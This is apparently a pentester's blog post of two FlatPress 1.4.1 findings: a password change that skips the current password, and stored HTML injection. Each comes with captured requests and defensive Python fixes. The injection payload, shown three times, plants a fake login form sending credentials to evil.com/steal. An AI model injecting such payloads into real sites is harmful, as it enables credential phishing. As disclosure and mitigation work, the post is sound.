Sunday, 21 September 2025

Friday Fun Pentest Series - 42 - Current Password not Required when Changing Password - flatpressv1.4.1

Description

- It was noted that the application did not require the current password for the password change functionality


Current Password not Required when Changing Password #1:

Steps to Reproduce:

  1. Log in as the admin user and visit "Main" > "Configuration" > "General Settings"
  2. Submit a new password through the password and confirm_password fields: the form never asks for, and the server never verifies, the current password (the request below carries no current-password parameter at all)

// HTTP POST Request

POST /FlatPressc4hak4mvef/admin.php?p=config&action=default HTTP/1.1
Host: demos5.softaculous.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]

_wpnonce=c1d6797fb9&_wp_http_referer=%2FFlatPressc4hak4mvef%2Fadmin.php%3Fp%3Dconfig&admin=admin&password=&confirm_password=&title=FlatPress&subtitle=My+FlatPress+blog&blogfooter=&author=test&www=http%3A%2F%2Fdemos5.softaculous.com%2FFlatPressc4hak4mvef%2F&email=demos%40softaculous.com&notify=on&startpage=%3ANULL%3A&maxentries=5&timeoffset=0&dateformat=%25A%2C+%25B+%25e%2C+%25Y&dateformatshort=%25Y-%25m-%25d&timeformat=%25H%3A%25M%3A%25S&lang=en-us&charset=utf-8&save=Save+Changes


// HTTP Response

HTTP/1.1 200 OK
Date: Sun, 21 Sep 2025 15:14:16 GMT
Server: FlatPress
[...]
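The fix on the server side is to re-authenticate the session user before the credential is rotated. The handler below is an added illustration written for this post, not FlatPress code; it assumes an in-memory user store (constructed here) and a form with the same password/confirm_password field names as the request above, plus a hypothetical current_password field the patched form would add. Empty password fields are treated as "leave unchanged", which is how the captured request reads.

```python
import hashlib
import hmac
import secrets

# In-memory user store, constructed for this example (assumption: a real
# application keeps salted password hashes in its own user database).
USERS = {}

# Iteration count kept modest so the example runs quickly; production
# deployments should use a much higher work factor.
PBKDF2_ITERATIONS = 100_000
MIN_PASSWORD_LENGTH = 12


def _hash_password(password, salt):
    """PBKDF2-HMAC-SHA256 of the password under the given salt."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)


def create_user(username, password):
    """Register a user with a fresh random salt (setup helper for the example)."""
    salt = secrets.token_bytes(16)
    USERS[username] = {"salt": salt, "hash": _hash_password(password, salt)}


def verify_password(username, password):
    """Constant-time check of a candidate password against the stored hash."""
    record = USERS.get(username)
    if record is None:
        # Hash anyway so unknown and known usernames take similar time.
        _hash_password(password, b"\x00" * 16)
        return False
    candidate = _hash_password(password, record["salt"])
    return hmac.compare_digest(record["hash"], candidate)


def change_password(session_user, form):
    """Handle a settings form like the one in the request above.

    session_user is the authenticated user taken from the server-side
    session, never from the form. Returns (ok, message). An empty new
    password means "leave the password unchanged", as in the captured
    request (password=&confirm_password=).
    """
    current = form.get("current_password", "")   # hypothetical added field
    new = form.get("password", "")
    confirm = form.get("confirm_password", "")

    if new == "" and confirm == "":
        return True, "password unchanged"

    # The missing check: re-authenticate before touching the credential.
    if not verify_password(session_user, current):
        return False, "current password incorrect"

    if new != confirm:
        return False, "new passwords do not match"
    if len(new) < MIN_PASSWORD_LENGTH:
        return False, "new password too short"

    salt = secrets.token_bytes(16)
    USERS[session_user] = {"salt": salt, "hash": _hash_password(new, salt)}
    # A real handler would also invalidate the user's other sessions here.
    return True, "password changed"


if __name__ == "__main__":
    create_user("admin", "OldPassw0rd!")
    print(change_password("admin", {"password": "NewPassw0rd!!",
                                    "confirm_password": "NewPassw0rd!!"}))
    print(change_password("admin", {"current_password": "OldPassw0rd!",
                                    "password": "NewPassw0rd!!",
                                    "confirm_password": "NewPassw0rd!!"}))
```

The _wpnonce token in the captured request only protects against cross-site request forgery; it does nothing for a session that has already been stolen or for an unattended admin browser, which is exactly the scenario the current-password check covers.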



Friday Fun Pentest Series - 41 - Stored HTML Injection - flatpressv1.4.1

Description

- It was noted that the application was vulnerable to Stored HTML Injection in the "Write Entry" functionality: markup placed inside an [html] block is stored and rendered back to readers without filtering, as the GET response below shows


Stored HTML Injection #1:

Steps to Reproduce:

- Log in as the admin user, visit "Main" > "New Entry" > "Write Entry", and enter the payload below in the entry content

[html]<div style="border:2px solid red;padding:20px;margin:20px;background:yellow"><h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p><form action="https://evil.com/steal"><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button>Login</button></form></div>[/html]


// HTTP POST Request

POST /FlatPressns3ufyfxkj/admin.php?p=entry&action=write HTTP/1.1
Host: demos5.softaculous.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]

_wpnonce=ee76fd6c94&_wp_http_referer=/FlatPressns3ufyfxkj/admin.php?p=entry&action=write&date_hour=16&date_minute=12&date_second=51&date_month=09&date_day=21&date_year=2025&subject=HTMLi&timestamp=1758471158&entry=&attachselect=-- Selection --&imageselect=-- Selection --&content=[html]<div style="border:2px solid red;padding:20px;margin:20px;background:yellow"><h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p><form action="https://evil.com/steal"><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button>Login</button></form></div>[/html]&pl_file_meta=fp-content/content/seometa/default/metatags.ini&pl_description=&pl_keywords=&save=Publish


// HTTP Response

HTTP/1.1 302 Found
Date: Sun, 21 Sep 2025 16:12:55 GMT
Server: FlatPress
[...]


// HTTP GET Request

GET /FlatPressns3ufyfxkj/index.php/2025/09/21/htmli/ HTTP/1.1
Host: demos5.softaculous.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]


// HTTP Response

HTTP/1.1 200 OK
Date: Sun, 21 Sep 2025 16:12:58 GMT
Server: FlatPress
[...]

[...]
<div itemprop="articleBody"><p><div style="border:2px solid red;padding:20px;margin:20px;background:yellow"><h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p><form action="https://evil.com/steal"><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button>Login</button></form></div></p></div>
[...]
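The articleBody above shows the stored markup echoed verbatim, form and all. One mitigation is to pass the body of an [html] block through an allowlist sanitizer before it is stored (or before it is rendered), so that harmless formatting survives while forms, inputs, scripts, inline styles and event-handler attributes are stripped. The sanitizer below is an added example written for this post, not FlatPress code; the tag and attribute allowlist is this example's own choice, and the sample input is the payload from the write-up above.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Allowlist chosen for this example: simple formatting only, no forms, scripts,
# iframes, styles or event handlers.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "h2", "h3",
                "ul", "ol", "li", "a", "blockquote", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}


def _safe_url(value):
    """Accept only relative URLs and http(s); rejects other URL schemes."""
    if value is None:
        return False
    cleaned = "".join(ch for ch in value.strip() if ch not in "\t\r\n")
    return urlsplit(cleaned).scheme.lower() in ("", "http", "https")


class AllowlistSanitizer(HTMLParser):
    """Re-emits only allowlisted tags/attributes; everything else becomes text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # tag dropped; its inner text still flows through handle_data
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops style, class, on* handlers and the like
            if name == "href" and not _safe_url(value):
                continue
            kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag not in self.open_tags:
            return  # closing tag of a dropped, void or never-opened element
        while self.open_tags:  # close intermediate tags to stay well-formed
            open_tag = self.open_tags.pop()
            self.out.append(f"</{open_tag}>")
            if open_tag == tag:
                break

    def handle_data(self, data):
        # Text is always escaped, including the bodies of <script>/<style>.
        self.out.append(html.escape(data, quote=False))

    def result(self):
        self.close()  # flush any buffered text
        while self.open_tags:  # close anything the input left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize(fragment):
    """Return a cleaned HTML fragment that is safe to store or render in a post."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    return parser.result()


# The [html] payload body from the write-up above, used as sample input.
PAGE_PAYLOAD = ('<div style="border:2px solid red;padding:20px;margin:20px;background:yellow">'
                '<h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p>'
                '<form action="https://evil.com/steal"><input type="text" placeholder="Username">'
                '<input type="password" placeholder="Password"><button>Login</button></form></div>')

if __name__ == "__main__":
    print(sanitize(PAGE_PAYLOAD))
```

Run against the page's payload this keeps the heading and paragraph and reduces the fake login form to the bare word "Login". Whether the [html] block should exist at all for non-admin authors is a separate policy question; if it stays, sanitizing on save and escaping everything else on output gives defence in depth.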




